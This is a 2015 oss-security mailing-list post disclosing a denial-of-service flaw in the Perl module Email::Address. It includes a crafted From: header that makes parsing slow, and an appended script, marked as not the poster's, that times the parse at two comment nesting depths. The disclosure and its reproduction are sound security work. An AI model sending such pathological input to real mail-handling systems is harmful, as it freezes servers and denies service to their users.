Date: Sun, 27 Sep 2015 09:53:59 +0200
From: Pali Rohár <pali.rohar@...il.com>
To: oss-security@...ts.openwall.com
Subject: DoS attack through Email-Address perl module v1.907 (CVE id request)

Hello!

I discovered a possible DoS attack in any software which uses the Email::Address perl module for parsing string input into a list of email addresses.

By default the Email::Address module, version v1.907 (and all before), tries to understand nestable comments in the input string with nesting depth 2. Parsing nestable comments is too slow for specially prepared inputs and can cause high CPU load, freezing the application and causing a Denial of Service.

Because the input string for the Email::Address module comes from an external source (e.g. from an email sent by an attacker), it is a security problem for all software applications which parse email messages with the Email::Address perl module. For example: RT: Request Tracker, CiderWebmail, ...

In the new version v1.908 of the Email::Address module, released on Sep 19, the default value of nestable comments was set to depth 1. This is not a proper fix, just a workaround for pathological inputs with nestable comments. Probably nobody has a normal use for inserting nested comments into email addresses in To:/Cc: headers...

https://metacpan.org/release/RJBS/Email-Address-1.908
https://github.com/rjbs/Email-Address/commit/3056b7d

Can you assign a CVE id for this problem?

In the attachment I'm sending an example perl script which uses the Email::Address module for parsing a From header, and an example input. On my machine that script runs for 5 seconds and parses just four addresses. Imagine that an attacker sends an email with a Cc: header with 10 times more addresses; the Email::Address module effectively DoSes the server where that parser is running...
--
Pali Rohár
pali.rohar@...il.com

\(¯¯`·.¥«P®ÎÑç€ØfTh€ÐÅ®K»¥.·`¯¯\) <email@...mple.com>, "(> \" \" <) ( ='o'= ) (\")___(\") sWeEtAnGeLtHePrInCeSsOfThEsKy" <email2@...mple.com>, "(i)cRiStIaN(i)" <email3@...mple.com>, "(S)MaNu_vuOLeAmMazZaReNimOe(*)MiAo(@)" <email4@...mple.com>

[ CONTENT OF TYPE application/x-perl SKIPPED ]
[ CONTENT OF TYPE application/pgp-signature SKIPPED ]
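The perl script attached to the mail was not kept by the archive. The following is an added example, written here and not the poster's script, that reproduces the measurement he describes: it feeds the sample From: header above to Email::Address->parse() and reports how long the call takes. Email::Address exposes the nesting depth as the documented package variable $Email::Address::COMMENT_NEST_LEVEL; it is initialised with ||= when the module is compiled, so it has to be set in a BEGIN block before the module is loaded. The NEST environment variable is this example's own knob, and the example.com domains stand in for the addresses the archive obfuscated (both are assumptions, not from the original post).

```perl
#!/usr/bin/perl
# Added example (not the script attached to the original mail): time
# Email::Address->parse() on the post's sample From: header under a chosen
# comment nesting depth.
use strict;
use warnings;
use utf8;
use Time::HiRes qw(time);

# $Email::Address::COMMENT_NEST_LEVEL is initialised with ||= when the module
# is compiled, so it must be set in a BEGIN block before "use Email::Address".
# NEST is this example's own environment variable (an assumption): it defaults
# to the pre-1.908 value of 2, and NEST=1 gives the 1.908 default.
BEGIN { $Email::Address::COMMENT_NEST_LEVEL = $ENV{NEST} || 2 }
use Email::Address;

binmode STDOUT, ':encoding(UTF-8)';

# The four display names from the post's sample input, full of unbalanced
# parentheses that drive the nested-comment regex into heavy backtracking.
# The archive obfuscated the domains, so example.com is substituted here
# (an assumption).
my $header = join ', ',
    q{\(¯¯`·.¥«P®ÎÑç€ØfTh€ÐÅ®K»¥.·`¯¯\) <email@example.com>},
    q{"(> \" \" <) ( ='o'= ) (\")___(\") sWeEtAnGeLtHePrInCeSsOfThEsKy" <email2@example.com>},
    q{"(i)cRiStIaN(i)" <email3@example.com>},
    q{"(S)MaNu_vuOLeAmMazZaReNimOe(*)MiAo(@)" <email4@example.com>};

# Parse a header value once and return the wall-clock seconds it took together
# with the Email::Address objects that were found.
sub timed_parse {
    my ($value) = @_;
    my $t0    = time;
    my @addrs = Email::Address->parse($value);
    return (time - $t0, @addrs);
}

my ($seconds, @addrs) = timed_parse($header);
printf "COMMENT_NEST_LEVEL=%d: %d address(es) parsed in %.2f s\n",
    $Email::Address::COMMENT_NEST_LEVEL, scalar @addrs, $seconds;
printf "  %s\n", $_->address for @addrs;
```

Run it twice, as `NEST=2 perl parse_from.pl` and `NEST=1 perl parse_from.pl`, to compare the pre-1.908 behaviour with the 1.908 default. The post reports about 5 seconds for these four addresses at depth 2; the absolute figure depends on the CPU and perl build, and the point of the measurement is the gap between the two depths on the same machine. As the poster notes, lowering the depth only shortens the worst case for this kind of input rather than removing the backtracking, so an application that parses headers from untrusted mail should still budget CPU time per message.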